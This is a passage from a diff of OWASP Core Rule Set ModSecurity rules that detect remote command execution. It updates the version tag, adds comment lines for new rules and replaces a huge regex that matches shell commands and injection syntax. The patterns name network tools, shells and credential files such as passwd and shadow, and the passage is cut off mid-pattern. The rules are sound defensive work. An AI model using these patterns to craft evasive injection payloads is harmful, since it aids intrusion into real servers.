-9\?@_a-\{]*)?\x5c?d|z)|y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:4[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?))[\s\x0b&\),<>\|].*|a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?-[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[&\),<>\|]{1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}[\s\x0b&\),<>\|\}]{1,10})|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*)|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[&\),<>\|]{1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}[\s\x0b&\),<>\|\}]{1,10})|(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|[hr][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*))\b" \ "id:932230,\ phase:2,\ block,\ @@ -135,7 +137,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -154,6 +156,8 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? # # .932250 (base rule, PL1, targets two and three character commands) # .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# .932340 (PL-1, matches commands with no arguments) +# .932350 (PL-3, matches commands with no arguments) # # .932240 (generic detection, PL2, targets generic evasion attempts) # .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, @@ -179,7 +183,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 932235 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:HEAD|POST|y(?:arn|elp))(?:[\s\x0b&\),<>\|]|$)|a(?:dd(?:group|user)|getty|(?:l(?:ias|pine)|tobm|xel)(?:[\s\x0b&\),<>\|]|$)|nsible|p(?:parmor_[^\s\x0b]{1,10}\b|t(?:-get|itude(?:[\s\x0b&\),<>\|]|$)))|r(?:ch(?:[\s\x0b&\),<>\|]|$)|ia2c|j(?:-register|disp))|s(?:cii(?:-xfr|85)|pell)|u(?:ditctl|repot|search))|b(?:a(?:s(?:e(?:32|64|n(?:ame(?:[\s\x0b&\),<>\|]|$)|c))|h(?:[\s\x0b&\),<>\|]|$))|tch(?:[\s\x0b&\),<>\|]|$))|lkid(?:[\s\x0b&\),<>\|]|$)|pftrace|r(?:eaksw|(?:idge|wap)(?:[\s\x0b&\),<>\|]|$))|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler(?:[\s\x0b&\),<>\|]|$)|zip2)|s(?:ctl|ybox))|y(?:ebug|obu(?:[\s\x0b&\),<>\|]|$))|z(?:c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|diff|e(?:grep|xe(?:[\s\x0b&\),<>\|]|$))|f?grep|ip2(?:[\s\x0b&\),<>\|]|$|recover)|less|more))|c(?:[89]9-gcc|a(?:ncel|psh)(?:[\s\x0b&\),<>\|]|$)|ertbot|h(?:(?:(?:att|di)r|mod|o(?:om|wn)|root|sh)(?:[\s\x0b&\),<>\|]|$)|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f(?:[\s\x0b&\),\-<>\|]|$))|(?:flag|pas)s|g(?:passwd|rp(?:[\s\x0b&\),<>\|]|$)))|lang(?:\+\+|[\s\x0b&\),<>\|]|$)|o(?:bc(?:[\s\x0b&\),<>\|]|$|run)|lumn(?:[\s\x0b&\),<>\|]|$)|m(?:m(?:[\s\x0b&\),<>\|]|$|and(?:[\s\x0b&\),<>\|]|$))|p(?:oser|ress)(?:[\s\x0b&\),<>\|]|$))|proc|w(?:say|think))|p(?:(?:an|io)(?:[\s\x0b&\),<>\|]|$)|ulimit)|r(?:ash(?:[\s\x0b&\),<>\|]|$)|on(?:[\s\x0b&\),<>\|]|$|tab))|s(?:cli(?:[\s\x0b&\),<>\|]|$)|plit|vtool)|u(?:psfilter|rl(?:[\s\x0b&\),<>\|]|$)))|d(?:(?:ash|i(?:alog|ff)|vips)(?:[\s\x0b&\),<>\|]|$)|hclient|m(?:esg(?:[\s\x0b&\),<>\|]|$)|idecode|setup)|o(?:(?:as|ne)(?:[\s\x0b&\),<>\|]|$)|cker(?:[\s\x0b&\),\-<>\|]|$)|sbox)|pkg(?:[\s\x0b&\),\-<>\|]|$))|e(?:2fsck|asy_install|(?:cho|fax|grep|macs|sac|val)(?:[\s\x0b&\),<>\|]|$)|n(?:d(?:if|sw)(?:[\s\x0b&\),<>\|]|$)|v-update)|x(?:(?:ec|p(?:and|(?:ec|or)t|r))(?:[\s\x0b&\),<>\|]|$)|iftool))|f(?:acter|d(?:(?:find|isk)(?:[\s\x0b&\),<>\|]|$)|u?mount)|(?:etch|grep|lock|unction)(?:[\s\x0b&\),<>\|]|$)|i(?:le(?:[\s\x0b&\),<>\|]|$|test)|(?:n(?:d|ger)|sh)(?:[\s\x0b&\),<>\|]|$))|o(?:ld(?:[\s\x0b&\),<>\|]|$)|reach)|ping(?:[\s\x0b&\),6<>\|]|$)|tp(?:stats|who))|g(?:(?:awk|core|i(?:mp|nsh)|z(?:cat|exe|ip))(?:[\s\x0b&\),<>\|]|$)|e(?:ni(?:e(?:[\s\x0b&\),<>\|]|$)|soimage)|t(?:cap|facl(?:[\s\x0b&\),<>\|]|$)))|hc(?:-(?:[\s\x0b&\),<>\|]|$)|i(?:[\s\x0b&\),\-<>\|]|$))|r(?:(?:cat|ep)(?:[\s\x0b&\),<>\|]|$)|oupmod)|tester|unzip)|h(?:(?:ash|i(?:ghlight|story))(?:[\s\x0b&\),<>\|]|$)|e(?:ad(?:[\s\x0b&\),<>\|]|$)|xdump)|ost(?:id|name)|ping3|t(?:digest|op(?:[\s\x0b&\),<>\|]|$)|passwd))|i(?:(?:conv|nstall)(?:[\s\x0b&\),<>\|]|$)|f(?:config|top(?:[\s\x0b&\),<>\|]|$))|onice|p(?:6?tables|config|p(?:eveprinter|find|tool))|spell)|j(?:(?:ava|exec)(?:[\s\x0b&\),<>\|]|$)|o(?:in(?:[\s\x0b&\),<>\|]|$)|urnalctl)|runscript)|k(?:ill(?:[\s\x0b&\),<>\|]|$|all)|nife(?:[\s\x0b&\),<>\|]|$)|sshell)|l(?:a(?:st(?:comm(?:[\s\x0b&\),<>\|]|$)|log(?:in)?)|tex(?:[\s\x0b&\),<>\|]|$))|dconfig|ess(?:echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|$|get)|o(?:(?:cate|ok)(?:[\s\x0b&\),<>\|]|$)|g(?:inctl|(?:nam|sav)e)|setup)|s(?:(?:-F|cpu|hw|mod|of|pci|usb)(?:[\s\x0b&\),<>\|]|$)|b_release)|trace|ua(?:la)?tex|wp-(?:d(?:ownload|ump)|mirror|request)|ynx(?:[\s\x0b&\),<>\|]|$)|z(?:4c(?:[\s\x0b&\),<>\|]|$|at)|c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|diff|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|$|dec|info)|ore)))|m(?:a(?:il(?:[\s\x0b&\),<>\|]|$|[qx](?:[\s\x0b&\),<>\|]|$))|(?:ke|wk)(?:[\s\x0b&\),<>\|]|$)|ster\.passwd)|k(?:(?:dir|nod)(?:[\s\x0b&\),<>\|]|$)|fifo|temp)|locate|o(?:squitto|unt(?:[\s\x0b&\),<>\|]|$))|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|utt(?:[\s\x0b&\),<>\|]|$)|ysql(?:[\s\x0b&\),<>\|]|$|admin|dump(?:slow)?|hotcopy|show))|n(?:(?:a(?:no|sm|wk)|ice|map|o(?:de|hup)|ping|roff|ull)(?:[\s\x0b&\),<>\|]|$)|c(?:\.(?:openbsd|traditional)|at(?:[\s\x0b&\),<>\|]|$))|e(?:ofetch|t(?:(?:c|st)at|kit-ftp|plan))|s(?:enter|lookup|tat(?:[\s\x0b&\),<>\|]|$)))|o(?:ctave(?:[\s\x0b&\),<>\|]|$)|nintr|p(?:en(?:ssl|v(?:pn|t))|kg(?:[\s\x0b&\),<>\|]|$)))|p(?:a(?:(?:cman|rted|tch)(?:[\s\x0b&\),<>\|]|$)|s(?:swd|te(?:[\s\x0b&\),<>\|]|$)))|d(?:b(?:2mb|3(?:[\s\x0b&\),\.<>\|]|$))|f(?:la)?tex|ksh(?:[\s\x0b&\),<>\|]|$))|er(?:(?:f|ms)(?:[\s\x0b&\),<>\|]|$)|l(?:5?(?:[\s\x0b&\),<>\|]|$)|sh))|(?:(?:ft|gre)p|opd|u(?:ppet|shd))(?:[\s\x0b&\),<>\|]|$)|hp(?:-cgi|[57](?:[\s\x0b&\),<>\|]|$))|i(?:(?:co|gz|ng6?)(?:[\s\x0b&\),<>\|]|$)|dstat)|k(?:exec|g_?info|ill(?:[\s\x0b&\),<>\|]|$))|rint(?:env|f(?:[\s\x0b&\),<>\|]|$))|s(?:(?:ed|ql)(?:[\s\x0b&\),<>\|]|$)|ftp)|tar(?:[\s\x0b&\),<>\|]|$|diff|grep)|wd\.db|y(?:3?versions|thon(?:[23]|[^\s\x0b]{1,10}\b)))|r(?:(?:ak[eu]|bash|nano|oute|vi(?:ew|m))(?:[\s\x0b&\),<>\|]|$)|e(?:a(?:delf|lpath)|(?:(?:boo|dcarpe)t|name|p(?:eat|lace))(?:[\s\x0b&\),<>\|]|$)|stic)|l(?:ogin|wrap)|m(?:dir(?:[\s\x0b&\),<>\|]|$)|t-(?:dump|tar)|user)|pm(?:db(?:[\s\x0b&\),<>\|]|$)|(?:quer|verif)y)|sync(?:-ssl|[\s\x0b&\),<>\|]|$)|u(?:by[^\s\x0b]{1,10}\b|n(?:-(?:mailcap|parts)|c(?:[\s\x0b&\),<>\|]|$))))|s(?:(?:ash|c(?:hed|r(?:een|ipt))|diff|(?:ft|na)p|l(?:eep|sh))(?:[\s\x0b&\),<>\|]|$)|e(?:(?:ndmail|rvice)(?:[\s\x0b&\),<>\|]|$)|t(?:arch|cap|env|facl(?:[\s\x0b&\),<>\|]|$)|sid))|h(?:\.distrib|(?:adow|ells|u(?:f|tdown))(?:[\s\x0b&\),<>\|]|$))|mbclient|o(?:(?:ca|r)t(?:[\s\x0b&\),<>\|]|$)|elim)|p(?:lit(?:[\s\x0b&\),<>\|]|$)|wd\.db)|qlite3|sh(?:-(?:a(?:dd|gent)|copy-id|key(?:ge|sca)n)|pass)|t(?:art-stop-daemon|d(?:buf|err|in(?:[\s\x0b&\),<>\|]|$)|out)|r(?:ace|ings(?:[\s\x0b&\),<>\|]|$)))|udo(?:-rs|[\s\x0b&\),<>_\|]|$|edit|replay)|vn(?:a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:il(?:[\s\x0b&\),<>\|]|$|f(?:[\s\x0b&\),<>\|]|$))|sk(?:[\s\x0b&\),<>\|]|$|set))|c(?:l?sh(?:[\s\x0b&\),<>\|]|$)|p(?:dump|ing|traceroute))|elnet|(?:ftp|mux|ouch)(?:[\s\x0b&\),<>\|]|$)|ime(?:datectl|out(?:[\s\x0b&\),<>\|]|$))|r(?:aceroute6?|off(?:[\s\x0b&\),<>\|]|$))|shark)|u(?:limit(?:[\s\x0b&\),<>\|]|$)|n(?:(?:ame|compress|iq|rar|s(?:et|hare)|xz)(?:[\s\x0b&\),<>\|]|$)|expand|l(?:ink(?:[\s\x0b&\),<>\|]|$)|z(?:4(?:[\s\x0b&\),<>\|]|$)|ma))|pigz|z(?:ip(?:[\s\x0b&\),<>\|]|$)|std))|p(?:2date(?:[\s\x0b&\),<>\|]|$)|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:algrind|i(?:(?:[ep]w|gr|rsh)(?:[\s\x0b&\),<>\|]|$)|mdiff|sudo(?:-rs)?)|olatility(?:[\s\x0b&\),<>\|]|$))|w(?:(?:all|get)(?:[\s\x0b&\),<>\|]|$)|h(?:iptail(?:[\s\x0b&\),<>\|]|$)|o(?:ami|is(?:[\s\x0b&\),<>\|]|$)))|i(?:reshark|sh(?:[\s\x0b&\),<>\|]|$)))|x(?:(?:args|pad|term)(?:[\s\x0b&\),<>\|]|$)|e(?:latex|tex(?:[\s\x0b&\),<>\|]|$))|mo(?:dmap|re(?:[\s\x0b&\),<>\|]|$))|z(?:c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|d(?:ec(?:[\s\x0b&\),<>\|]|$)|iff)|[ef]?grep|less|more))|z(?:athura|(?:c(?:at|mp)|diff|grep|less|run)(?:[\s\x0b&\),<>\|]|$)|e(?:grep|ro(?:[\s\x0b&\),<>\|]|$))|fgrep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|mo(?:dload|re(?:[\s\x0b&\),<>\|]|$))|s(?:oelim|td(?:[\s\x0b&\),<>\|]|$|(?:ca|m)t|grep|less))|ypper))" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:HEAD|POST|y(?:arn|elp))[\s\x0b&\),<>\|]|a(?:dd(?:group|user)|getty|(?:l(?:ias|pine)|tobm|xel)[\s\x0b&\),<>\|]|nsible|p(?:parmor_[^\s\x0b]{1,10}\b|t(?:-get|itude[\s\x0b&\),<>\|]))|r(?:ch[\s\x0b&\),<>\|]|ia2c|j(?:-register|disp))|s(?:cii(?:-xfr|85)|pell)|u(?:ditctl|repot|search))|b(?:a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\),<>\|]|c))|h[\s\x0b&\),<>\|])|tch[\s\x0b&\),<>\|])|lkid[\s\x0b&\),<>\|]|pftrace|r(?:eaksw|(?:idge|wap)[\s\x0b&\),<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\),<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu[\s\x0b&\),<>\|])|z(?:c(?:at|mp)[\s\x0b&\),<>\|]|diff|e(?:grep|xe[\s\x0b&\),<>\|])|f?grep|ip2(?:[\s\x0b&\),<>\|]|recover)|less|more))|c(?:[89]9-gcc|a(?:ncel|psh)[\s\x0b&\),<>\|]|ertbot|h(?:(?:(?:att|di)r|mod|o(?:om|wn)|root|sh)[\s\x0b&\),<>\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f[\s\x0b&\),\-<>\|])|(?:flag|pas)s|g(?:passwd|rp[\s\x0b&\),<>\|]))|lang(?:\+\+|[\s\x0b&\),<>\|])|o(?:bc(?:[\s\x0b&\),<>\|]|run)|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\),<>\|]|proc|w(?:say|think))|p(?:(?:an|io)[\s\x0b&\